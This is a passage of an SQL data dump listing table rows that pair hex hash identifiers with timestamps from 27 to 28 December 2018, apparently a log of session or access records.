(43039, 'eef6915aef433073d6b8425ece94479c', '5431219d94c0894d', 0, 2, 1, '2018-12-27 22:24:06'),
(43040, 'e9777fd4d44154fa6c611e824cb87dcc', 'ff50e2d6b26fbeec', 0, 2, 1, '2018-12-27 22:25:56'),
(43041, 'e3a59e3cf25a1061553ff539316e5e81', '3e07c8d2cc59ef04', 0, 2, 1, '2018-12-27 22:43:31'),
(43042, '319e9b7a38e84bf76be7bcf2ac96fc79', '72abf74625a8a487', 0, 2, 1, '2018-12-27 22:45:53'),
(43043, '34af19a516bf1e04cc690b8accf30a10', 'd91edc5410a781d7', 0, 2, 1, '2018-12-27 22:57:37'),
(43044, 'ea9e885945398a1fb3ef2e97c9c55ca9', '70f1996ad42286c5', 0, 2, 1, '2018-12-27 23:05:32'),
(43045, '42ecc652740357373bce50df80002175', '0326321c71cab305', 0, 2, 1, '2018-12-27 23:05:33'),
(43046, 'ea9f39ed7db80cee40b0e67406ad78ac', '882d07045b2a56d0', 0, 2, 1, '2018-12-27 23:37:08'),
(43047, '6568cf61bac6627428083069d67c43d2', '10f60983236d883b', 0, 2, 1, '2018-12-27 23:45:12'),
(43048, '6568cf61bac6627428083069d67c43d2', '10f60983236d883b', 0, 2, 1, '2018-12-27 23:46:12'),
(43049, '8f37237066658797bc2eebc02fd629b9', '17957a0620cdb42d', 0, 2, 1, '2018-12-28 00:18:55'),
(43050, '850c219731a14d04661c2017f84fe649', 'f0dd6e6e39f3ff3e', 0, 2, 1, '2018-12-28 00:28:32'),
(43051, '1d05c8ca6068cdcb72eab01e755150cb', 'cfafdfd3e139a857', 0, 2, 1, '2018-12-28 00:37:51'),
(43052, '6261ede6aa1da635dcab299c0d99c717', '96a9ff086dc18917', 0, 2, 1, '2018-12-28 00:57:23'),
(43053, '6fd30131896ebc5dc95bbbebea2a1d15', 'feda182b5c8fdb65', 0, 2, 1, '2018-12-28 01:08:15'),
(43054, 'e1841630b62c8310b3e87f2c5cc221b4', 'a8e28606b85d9cd5', 0, 2, 1, '2018-12-28 01:25:46'),
(43055, 'f4760b39fc4d8bc1de030f11184d0067', '5e6a4154cab82236', 0, 2, 1, '2018-12-28 02:09:05'),
(43056, '1d9cb4aaad1f4949a18589a7eef9ba4a', 'b096cf7c037d497c', 0, 2, 1, '2018-12-28 02:09:22'),
(43057, 'bb5bd42639b244bbbe591bb65eafb62a', '527efb6d6d5e5b17', 0, 2, 1, '2018-12-28 02:11:56'),
(43058, '554dc64c345f4d487bf2ef79f605c19d', '80635d2fb32fae1d', 0, 2, 1, '2018-12-28 02:35:51'),
(43059, '3c9aa664585083cecf6bc11f2dbbe88c', 'cc43ae1861f00ae6', 0, 2, 1, '2018-12-28 02:37:46'),
(43060, 'a4d218d7af6b91a546589da5754f77c9', '4f689d880b1f5368', 0, 2, 1, '2018-12-28 02:50:33'),
(43061, '5443bf055c6cbc7fc244e1100f812bbe', '82386e231949fe6e', 0, 2, 1, '2018-12-28 03:01:51'),
(43062, 'd4b637382f5284026f4740f15d456d8f', '461fce19f1b497c8', 0, 2, 1, '2018-12-28 03:56:28'),
(43063, 'd4b637382f5284026f4740f15d456d8f', '461fce19f1b497c8', 0, 2, 1, '2018-12-28 03:57:10'),
(43064, '95fefcb42420dd41ef7f146ff338ccbf', 'b755290048dbaada', 0, 2, 1, '2018-12-28 04:16:35'),
(43065, 'e34370a05c7d3668390fcce6cbb1e943', 'd6e711dd4264a73d', 0, 2, 1, '2018-12-28 04:17:41'),
(43066, 'ae1f4e0bf1df65f4f54a973dfcdab00d', '6a9dd6888bcb8fcc', 0, 2, 1, '2018-12-28 04:39:08'),
(43067, '9ba2f57061e1912ce74bebb5313397e7', 'd06320eae0436a82', 0, 2, 1, '2018-12-28 04:54:13'),
(43068, 'a301dc56931337323725be7b69aa02e4', '32788a2c86100198', 0, 2, 1, '2018-12-28 05:01:48'),
(43069, '416d84878ba056e43d5e0634a6d4cefd', 'c450938d9651dfc6', 0, 2, 1, '2018-12-28 05:06:45'),
(43070, '3bb61acbf16bd1d7dc9127fa115728e1', '326b037761f3dc36', 0, 2, 1, '2018-12-28 05:08:29'),
(43071, '9731f95f7d287a3f5591dd39db78f94f', '03d84dad4d32f564', 0, 2, 1, '2018-12-28 05:15:23'),
(43072, '554be228382a835dc630ba53230c1b5f', '46dec1ed0a0c2ea8', 0, 2, 1, '2018-12-28 05:20:23'),
(43073, '279272d4bcd0bf936e7c2188004b0634', '5868249354f6cda3', 0, 2, 1, '2018-12-28 05:29:55'),
(43074, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-28 05:31:43'),
(43075, 'f90f390ab2d393d94e37a0827a637bb2', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-28 06:29:54'),
(43076, '66e0f5ec9602dccc8379584de102e980', 'be8ba3c319c4a348', 0, 2, 1, '2018-12-28 06:31:16'),
(43077, '837ec91a197a0f9a6be31352d347baf2', '07bb8d6ce301cf5d', 0, 2, 1, '2018-12-28 06:44:39'),
(43078, '837ec91a197a0f9a6be31352d347baf2', '07bb8d6ce301cf5d', 0, 2, 1, '2018-12-28 06:45:10'),
(43079, '837ec91a197a0f9a6be31352d347baf2', '07bb8d6ce301cf5d', 0, 2, 1, '2018-12-28 06:45:29'),
(43080, '837ec91a197a0f9a6be31352d347baf2', '07bb8d6ce301cf5d', 0, 2, 1, '2018-12-28 06:45:58'),
(43081, 'b9ce1daaab63ccd185626a4ef0d9175f', 'b5209361c32799a0', 0, 2, 1, '2018-12-28 07:06:27'),
(43082, 'e74d700b817c5db310862804892b011d', '067c964088ccaea7', 0, 2, 1, '2018-12-28 07:16:45'),
(43083, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 07:58:09'),
(43084, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:01:50'),
(43085, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:02:44'),
(43086, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:03:48'),
(43087, '3b83ea032a08937f83be1fbe5801ffa6', 'a532820982915eaf', 0, 2, 1, '2018-12-28 08:05:23'),
(43088, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:06:41'),
(43089, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:07:14'),
(43090, 'e488490798abb70aa8fbd351d01f05d3', 'a4faa00bde32f932', 0, 2, 1, '2018-12-28 08:07:24'),
(43091, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:07:37'),
(43092, '080afdde552ea7eca7efa6e8145f81fd', 'f167d1cf3ffde177', 0, 2, 1, '2018-12-28 08:09:08'),
(43093, 'd851c86587fdf038522acc0e93919849', 'd9500931744bb85f', 0, 2, 1, '2018-12-28 08:11:31'),
(43094, '260bdd1531efe67227b16709688cf7f3', 'b123252687ee5eaf', 0, 2, 1, '2018-12-28 08:15:47'),
(43095, '5d2c08dc9836bcdb7edd2a9d2351427c', '8abcfcdeeb91a73c', 0, 2, 1, '2018-12-28 08:22:07'),
(43096, '1a6a9b53f942a775a72e27bf119aad24', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-28 08:30:58'),
(43097, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:33:19'),
(43098, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:34:11'),
(43099, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:34:51'),
(43100, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:36:31'),
(43101, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:37:06'),
(43102, '48a2841c06a267e0ffd7919b46d60081', '8d5e2cab9109b2b7', 0, 2, 1, '2018-12-28 08:40:53'),
(43103, '48a2841c06a267e0ffd7919b46d60081', '8d5e2cab9109b2b7', 0, 2, 1, '2018-12-28 08:41:35'),
(43104, '48a2841c06a267e0ffd7919b46d60081', '8d5e2cab9109b2b7', 0, 2, 1, '2018-12-28 08:42:02'),
(43105, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:48:12'),
(43106, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:49:12'),
(43107, '58ea79fee6fbc34c023b682d022eccab', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 08:49:23'),
(43108, '599b02256cadd74d6b80c57162734310', 'efd5d5fdaeb9f51f', 0, 2, 1, '2018-12-28 09:00:20'),
(43109, '3f0206321ff40c207a114010f7772eff', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-28 09:24:04'),
(43110, 'bc1bc229449082f1eb2c3e373c5b5719', 'f4c6d20cd9b4ffd2', 0, 2, 1, '2018-12-28 09:33:24'),
(43111, '3b03ef4e80e90d356191f31cf590a632', 'ff6c923f53d510ae', 0, 2, 1, '2018-12-28 09:57:21'),
(43112, '06d6777efe590dbd68422d4412830ffc', 'c3d30cb1c1e4a233', 0, 2, 1, '2018-12-28 10:00:10'),
(43113, '3f7700fea678384ffb6760333a523c0c', '1eb72067bbbb7ced', 0, 2, 1, '2018-12-28 10:00:20'),
(43114, '12f9fbbf5a8a07efbac37f68c79e2507', '13b90e20632e398d', 0, 2, 1, '2018-12-28 10:24:41'),
(43115, '76f5a6f80018e7c912ead6fff3a3c6e9', '9c5e742c76aa5d18', 0, 2, 1, '2018-12-28 10:27:17'),
(43116, '336cc16116992815b98bed22828876fc', 'edbce5d81295e6df', 0, 2, 1, '2018-12-28 10:40:47'),
(43117, '0fb5fec07765c608e252bef835f9067f', 'ac08b2632a442028', 0, 2, 1, '2018-12-28 10:59:58'),
(43118, '21d5ba8d0bbe6c8136aa63f135dab0af', 'bf953b9167b9dd19', 0, 2, 1, '2018-12-28 11:17:40'),
(43119, 'f76ce5d13f34ba309c642f8ac3b30fff', '2e4d937c41cd7723', 0, 2, 1, '2018-12-28 12:01:05'),
(43120, '626011ec094e1f0d850963f2e1a61499', '51df446c19685386', 0, 2, 1, '2018-12-28 12:18:14'),
(43121, 'f8c2d24bb93f07e2fc6ff7ca8dfee65d', 'fcaa52650bd7bb96', 0, 2, 1, '2018-12-28 12:35:41'),
(43122, '1cee722183253bdc67553b58a6c8f824', '3affdb6d237dd814', 0, 2, 1, '2018-12-28 12:39:54'),
(43123, '1cee722183253bdc67553b58a6c8f824', '3affdb6d237dd814', 0, 2, 1, '2018-12-28 12:40:17'),
(43124, 'e27beb0bf200c8952810870d886ec45b', '2e30529d84ca3698', 0, 2, 1, '2018-12-28 12:44:02'),
(43125, '03c646bb8e74410bf5867a629b8f83eb', 'e1dca05f99a4b750', 0, 2, 1, '2018-12-28 12:55:35'),
(43126, 'bcd8a9118bc1bc1a691358078bdffd0a', '51df446c19685386', 0, 2, 1, '2018-12-28 13:01:17'),
(43127, '1ee1e9d1709b4752918f40f459d757a1', 'a483fd532e796715', 0, 2, 1, '2018-12-28 13:03:23'),
(43128, '79d16e9aee9819b1ce180fd96d3a190b', 'fa880f84b5ddf5ae', 0, 2, 1, '2018-12-28 13:11:49'),
(43129, 'bbf10a44b555f569196fd1c872f7e825', 'd3a520ec2945459d', 0, 2, 1, '2018-12-28 13:16:39'),
(43130, '65e9c85f4160eb7dddb726c5fe95949c', 'e25e0f8d6ab9b5ff', 0, 2, 1, '2018-12-28 13:16:43'),
(43131, '6ce20df700f2c8e745c1cf09bb3a5548', '3ba3484de462963c', 0, 2, 1, '2018-12-28 13:17:00'),
(43132, 'a4ec067ffbe89d7a6bff0d963f68bc4c', 'ddddfb9f12f13c70', 0, 2, 1, '2018-12-28 13:27:51'),
(43133, '164c45eeb4a770895d5a7c58d27eca7e', '11c2c616103d82bf', 0, 2, 1, '2018-12-28 13:59:13'),
(43134, '4e74140f0f1875f98bbd529ec3297ac8', '409aca6d250d4119', 0, 2, 1, '2018-12-28 14:07:30'),
(43135, 'dbc1b71d750f908d8458efa800bc3150', 'f7e47a287f6d16fe', 0, 2, 1, '2018-12-28 14:26:13'),
(43136, '68a043fd14ab848a6f94f795d08769cc', '5ead57fa6009c004', 0, 2, 1, '2018-12-28 14:27:53'),
(43137, '8624dcb21591b7d70e02d82ff9283f88', '07f4033a179b5ac8', 0, 2, 1, '2018-12-28 14:29:47'),
(43138, '826973f3187c568692211aacdbef3bb3', '3f04250de0a2d1f3', 0, 2, 1, '2018-12-28 14:30:26'),
(43139, '7a5f97cb6e7cfd32a3dff5dded0b5ae6', '169176769f1a8d59', 0, 2, 1, '2018-12-28 14:36:24'),
(43140, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-28 14:39:57'),
(43141, '087770da9952d5fd3a147f87b70eb909', '3bfd387f7374a309', 0, 2, 1, '2018-12-28 14:51:48'),
(43142, '29749d11b18989cbda087abf5418e92d', 'c5a526306b75a9f7', 0, 2, 1, '2018-12-28 15:22:03'),
(43143, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2018-12-28 15:25:26'),
(43144, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2018-12-28 15:27:06'),
(43145, 'f96ef8fd66f4b5565c33b424dbf2e696', '46713cac27a94b83', 0, 2, 1, '2018-12-28 15:27:25'),
(43146, '4b02ec86da5346220ea3d57585d158a1', '3e07c8d2cc59ef04', 0, 2, 1, '2018-12-28 15:31:00'),
(43147, 'dc225df7cb7aaab0a40be0c17dc5d4b5', 'cad202a09758cb3a', 0, 2, 1, '2018-12-28 15:31:15'),
(43148, '7e7ab9a64a44eadc4da70f737cdfd91e', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-28 15:35:07'),
(43149, '7e7ab9a64a44eadc4da70f737cdfd91e', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-28 15:36:52'),
(43150, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2018-12-28 15:38:50'),
(43151, '1d79ada63087569d8c437d24e81deb14', '24a3a7dee025bca3', 0, 2, 1, '2018-12-28 15:39:23'),
(43152, '1d79ada63087569d8c437d24e81deb14', '24a3a7dee025bca3', 0, 2, 1, '2018-12-28 15:40:47'),
(43153, 'ddf4058e5764602e0b18d588cfb6c7be', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-28 15:44:10'),
(43154, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2018-12-28 15:44:53'),
(43155, 'd9c3d0d8a0599a6acb42e7f44eef22ea', '0d6d214e577e9800', 0, 2, 1, '2018-12-28 15:44:57'),
(43156, 'd9c3d0d8a0599a6acb42e7f44eef22ea', '0d6d214e577e9800', 0, 2, 1, '2018-12-28 15:45:04'),
(43157, 'd9c3d0d8a0599a6acb42e7f44eef22ea', '0d6d214e577e9800', 0, 2, 1, '2018-12-28 15:45:37'),
(43158, 'ddf4058e5764602e0b18d588cfb6c7be', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-28 15:46:38'),
(43159, 'ddf4058e5764602e0b18d588cfb6c7be', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-28 15:47:22'),
(43160, '1ba0761798834bd77b53632a0258990f', '3233431a244017cd', 0, 2, 1, '2018-12-28 15:48:12'),
(43161, '1ba0761798834bd77b53632a0258990f', '3233431a244017cd', 0, 2, 1, '2018-12-28 15:48:48'),
(43162, '1ba0761798834bd77b53632a0258990f', '3233431a244017cd', 0, 2, 1, '2018-12-28 15:49:03'),
(43163, 'cc6b6655aac37eb0be7b10985383ff32', '7cc7b5dd731a4b48', 0, 2, 1, '2018-12-28 15:49:12'),
(43164, 'cc6b6655aac37eb0be7b10985383ff32', '7cc7b5dd731a4b48', 0, 2, 1, '2018-12-28 15:49:22'),
(43165, '34496d2324f804d17cb84325ca1e80a1', 'ecb62154ee8c31cf', 0, 2, 1, '2018-12-28 15:52:43'),
(43166, 'a723231fca5047cf0e2c2f10ac904cea', 'fbf0576065758144', 0, 2, 1, '2018-12-28 15:55:19'),
(43167, '33a5fcb61f1a0fbb46d7c50982989bb0', 'b3dc303f7a11cd2f', 0, 2, 1, '2018-12-28 15:56:06'),
(43168, '4716cdc9760ed6fba96a04fb8c8f0dab', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-28 15:56:33'),
(43169, '8708fdbcc8ec2510f3a1e4ef735a3243', '14cb28e263fc2409', 0, 2, 1, '2018-12-28 15:56:58'),
(43170, 'b4df696a40ed94b22bb4201e947667aa', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 15:57:04'),
(43171, '858539fd036ff815709da2f039280b39', '00a1e8daf077053f', 0, 2, 1, '2018-12-28 15:57:42'),
(43172, '858539fd036ff815709da2f039280b39', '00a1e8daf077053f', 0, 2, 1, '2018-12-28 15:57:51'),
(43173, '3f0206321ff40c207a114010f7772eff', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-28 15:57:55'),
(43174, '0df99dd8f5c7f270ca3a4fcdc2cf25b0', '7501b42c35accff7', 0, 2, 1, '2018-12-28 15:58:10'),
(43175, 'b4df696a40ed94b22bb4201e947667aa', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 15:58:28'),
(43176, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-28 15:59:50'),
(43177, '1cee722183253bdc67553b58a6c8f824', '3affdb6d237dd814', 0, 2, 1, '2018-12-28 16:00:26'),
(43178, '54dbfee2f68e3f098c2753208f6092f3', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 16:01:52'),
(43179, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-28 16:02:01'),
(43180, '67a7ab772486f705aa232adbb9ff9128', '358a3a4d13e5d4e5', 0, 2, 1, '2018-12-28 16:02:03'),
(43181, '54dbfee2f68e3f098c2753208f6092f3', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 16:02:04'),
(43182, '8ac610f91171c11393764cf9ead2b1e1', '3e74d6b7f7b1f0fe', 0, 2, 1, '2018-12-28 16:02:07'),
(43183, '67a7ab772486f705aa232adbb9ff9128', '358a3a4d13e5d4e5', 0, 2, 1, '2018-12-28 16:02:31'),
(43184, 'ede2b309e3b5784962bf4f56ed5f40ae', 'f27681df79b531e4', 0, 2, 1, '2018-12-28 16:04:07'),
(43185, '2fca5cc7b0e7291d687c90800659f6b2', '2034f09284a4c7ca', 0, 2, 1, '2018-12-28 16:05:15'),
(43186, '67df6e8ba64fd3d3ede1ef2487753b72', '5c6572dc21972a01', 0, 2, 1, '2018-12-28 16:07:16'),
(43187, 'bbd25fd1406636148e73ac8b37aed373', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-28 16:08:00'),
(43188, '67df6e8ba64fd3d3ede1ef2487753b72', '5c6572dc21972a01', 0, 2, 1, '2018-12-28 16:08:03'),
(43189, '67df6e8ba64fd3d3ede1ef2487753b72', '5c6572dc21972a01', 0, 2, 1, '2018-12-28 16:09:44'),
(43190, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-28 16:10:18'),
(43191, '247f634fa067805e731cd09b1e68d3b7', 'd3ae1ea059514b6c', 0, 2, 1, '2018-12-28 16:10:44'),
(43192, '3fbce1b91419b7afa12d9bc8df8e19d6', '4084f3202f1f8f55', 0, 2, 1, '2018-12-28 16:12:50'),
(43193, '54dbfee2f68e3f098c2753208f6092f3', '59b83de799a67e7f', 0, 2, 1, '2018-12-28 16:13:23'),
(43194, '237d89f25c9711e04203db0bfcd647b0', '31dd9cca1b58dd64', 0, 2, 1, '2018-12-28 16:13:30'),
(43195, '237d89f25c9711e04203db0bfcd647b0', '31dd9cca1b58dd64', 0, 2, 1, '2018-12-28 16:14:11'),
(43196, '10ce27067ee2bbcc62438fb49d664d1a', 'a5736c988cfb53ac', 0, 2, 1, '2018-12-28 16:14:57'),
(43197, 'fe02dc4cdd4e0d9ef6bd0d0a8a8eae76', '8093e7b53c8fbc0b', 0, 2, 1, '2018-12-28 16:15:50'),
(43198, 'bc8a9d75072b498372bdbd9d53290bc6', '6e117bd555667400', 0, 2, 1, '2018-12-28 16:16:49'),
(43199, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-28 16:17:13'),
(43200, '22c3f55b0e32e6823fd015199ff0093e', '4cedd43a9d17ea0b', 0, 2, 1, '2018-12-28 16:17:48'),
(43201, '22c3f55b0e32e6823fd015199ff0093e', '4cedd43a9d17ea0b', 0, 2, 1, '2018-12-28 16:18:03'),
(43202, 'f96ef8fd66f4b5565c33b424dbf2e696', '46713cac27a94b83', 0, 2, 1, '2018-12-28 16:18:40'),
(43203, 'efb1d32a63848a2c12fc4ebe29ad0c54', '9a1a9db6d4db8522', 0, 2, 1, '2018-12-28 16:20:34'),
(43204, 'd8c116cb8e6000b006880ae10f2132c2', '4d0aeac5200fe301', 0, 2, 1, '2018-12-28 16:20:53'),
(43205, '67df6e8ba64fd3d3ede1ef2487753b72', '5c6572dc21972a01', 0, 2, 1, '2018-12-28 16:22:12'),
(43206, 'fdcc6d5488bdcb8dd4cf4fbb0faa7db3', '36afafd27d8a4f99', 0, 2, 1, '2018-12-28 16:22:44'),
(43207, '7f824493c56d7e18e28c412670a8f2aa', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-28 16:23:40'),
(43208, 'c32ea1f5c7d86c960456f68c83e1c899', '7b16863d40230e2a', 0, 2, 1, '2018-12-28 16:24:40'),
(43209, 'c32ea1f5c7d86c960456f68c83e1c899', '7b16863d40230e2a', 0, 2, 1, '2018-12-28 16:24:50'),
(43210, 'c32ea1f5c7d86c960456f68c83e1c899', '7b16863d40230e2a', 0, 2, 1, '2018-12-28 16:25:00'),
(43211, '1aa12b380bef6bf5d80f40a7f4770e2f', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-28 16:25:11'),
(43212, '6e617291c0bcc0667211734705b2b337', '6f62aaaccc7d6d3a', 0, 2, 1, '2018-12-28 16:27:16'),
(43213, '266705550d3088b8cbfb85eb5be4a56e', 'ddd30da2acb4cea3', 0, 2, 1, '2018-12-28 16:27:22'),
(43214, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-28 16:28:02'),
(43215, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-28 16:28:19'),
(43216, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-28 16:28:42'),
(43217, '801e2d5a56c7322bb30ba5f237facf4f', '15fdd013f34287ab', 0, 2, 1, '2018-12-28 16:28:59'),
(43218, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-28 16:29:42'),
(43219, 'd87428cd88beeb3e2c65ff62bd717615', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-28 16:32:10'),
(43220, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-28 16:32:30'),
(43221, '0397cb49b21ba885aabb68a0c3a1704f', '519c10bc515165db', 0, 2, 1, '2018-12-28 16:32:51'),
(43222, '45071972ba681c90029897ba0861e48d', 'c08b3fb023ba12ff', 0, 2, 1, '2018-12-28 16:35:05'),
(43223, 'a1938cf1343b7c521352e042c91f4810', '406a283c87583b3a', 0, 2, 1, '2018-12-28 16:35:18'),
(43224, '8cbe56242f95e3bdba1c34b91357703e', '02829647d6d6d42d', 0, 2, 1, '2018-12-28 16:36:46'),
(43225, '8cbe56242f95e3bdba1c34b91357703e', '02829647d6d6d42d', 0, 2, 1, '2018-12-28 16:36:59'),
(43226, '4716cdc9760ed6fba96a04fb8c8f0dab', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-28 16:37:12'),
(43227, 'fe02dc4cdd4e0d9ef6bd0d0a8a8eae76', '8093e7b53c8fbc0b', 0, 2, 1, '2018-12-28 16:37:34'),
(43228, '031f236cfd1fa15a4dff4f77a1d143db', '6a887ccd4964ed8c', 0, 2, 1, '2018-12-28 16:38:01'),
(43229, 'cca62adf5ef5dd68998dbd3154594910', 'd50d7502174878db', 0, 2, 1, '2018-12-28 16:39:41'),
(43230, 'cca62adf5ef5dd68998dbd3154594910', 'd50d7502174878db', 0, 2, 1, '2018-12-28 16:40:09'),
(43231, '8fc0c432084f25eb32adfc0308689c4d', '9968c5be4a7971a2', 0, 2, 1, '2018-12-28 16:40:31'),
(43232, '213dcf8edd82f628cb902d098ac98191', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-28 16:42:44'),
(43233, '213dcf8edd82f628cb902d098ac98191', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-28 16:43:04'),
(43234, '213dcf8edd82f628cb902d098ac98191', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-28 16:43:23'),
(43235, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-28 16:44:16'),
(43236, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-28 16:44:22'),
(43237, '904d0a92d35744cd3ba7c72ee7f6b343', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-28 16:45:35'),
(43238, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-28 16:46:24'),
(43239, '50a13d1c4d6242123bc608b7f9357bbb', '19dba98cb9cf777c', 0, 2, 1, '2018-12-28 16:46:29'),
(43240, '342fed80ad8b90e4020379b11f36fdb6', 'c610831ff4fd2742', 0, 2, 1, '2018-12-28 16:46:45'),
(43241, '1545a259c440847454783e567c8aa5bc', 'd57c6a47a6711062', 0, 2, 1, '2018-12-28 16:48:19'),
(43242, 'cb5c6fec3f04eadc3d0a6278e1fc3fb0', '4574603cf07e6399', 0, 2, 1, '2018-12-28 16:49:33'),
(43243, '705c75e18deb2d09739d54d7814002f2', '679c2311f97bf8cf', 0, 2, 1, '2018-12-28 16:50:02'),
(43244, '705c75e18deb2d09739d54d7814002f2', '679c2311f97bf8cf', 0, 2, 1, '2018-12-28 16:50:27'),
(43245, '8fc0c432084f25eb32adfc0308689c4d', '9968c5be4a7971a2', 0, 2, 1, '2018-12-28 16:52:00'),
(43246, '6533f2845153060c876408550b4e55a7', 'd8923e60c6dca0dc', 0, 2, 1, '2018-12-28 16:54:24'),
(43247, 'b1fe9a1dad9524c3ea511a8f8df9d976', '8c117e9ade9703d1', 0, 2, 1, '2018-12-28 16:54:55'),
(43248, 'ab1e3e6ac89d4d95d48ed8fbbbb5a224', 'e60565f388b0261b', 0, 2, 1, '2018-12-28 16:54:59'),
(43249, 'b1fe9a1dad9524c3ea511a8f8df9d976', '8c117e9ade9703d1', 0, 2, 1, '2018-12-28 16:55:41'),
(43250, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 16:55:53'),
(43251, '723ad4cf8f5195951d3063af4dca29ee', 'e87d2861fc6590e2', 0, 2, 1, '2018-12-28 16:56:00'),
(43252, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-28 16:56:02'),
(43253, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 16:56:17'),
(43254, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-28 16:56:51'),
(43255, 'a0f2a7252667a5fa98281d089da9c57e', 'c7b5d5ace7ac066b', 0, 2, 1, '2018-12-28 16:56:57'),
(43256, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-28 16:57:28'),
(43257, '45b5ed16d6d93189358c788e75f211f5', '0a2b7f24998a1fac', 0, 2, 1, '2018-12-28 16:58:13'),
(43258, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 16:58:41'),
(43259, '92fb9aa34bd509e0f1b288a0ab59a4df', 'cc2105dbd92b227a', 0, 2, 1, '2018-12-28 16:58:53'),
(43260, '8fc0c432084f25eb32adfc0308689c4d', '9968c5be4a7971a2', 0, 2, 1, '2018-12-28 17:00:16'),
(43261, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 17:00:32'),
(43262, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 17:00:36'),
(43263, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 17:02:20'),
(43264, '35aaad452592a91d2bd1502a467e49da', '4b8272c521136738', 0, 2, 1, '2018-12-28 17:02:54'),
(43265, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-28 17:03:29'),
(43266, 'a932444dd4c7be15d3326a282e2372c5', '503a514a8daa32a7', 0, 2, 1, '2018-12-28 17:03:37'),
(43267, 'bd72eeafa23809f95938ea89c666c3fe', '863b661787591b2d', 0, 2, 1, '2018-12-28 17:06:51'),
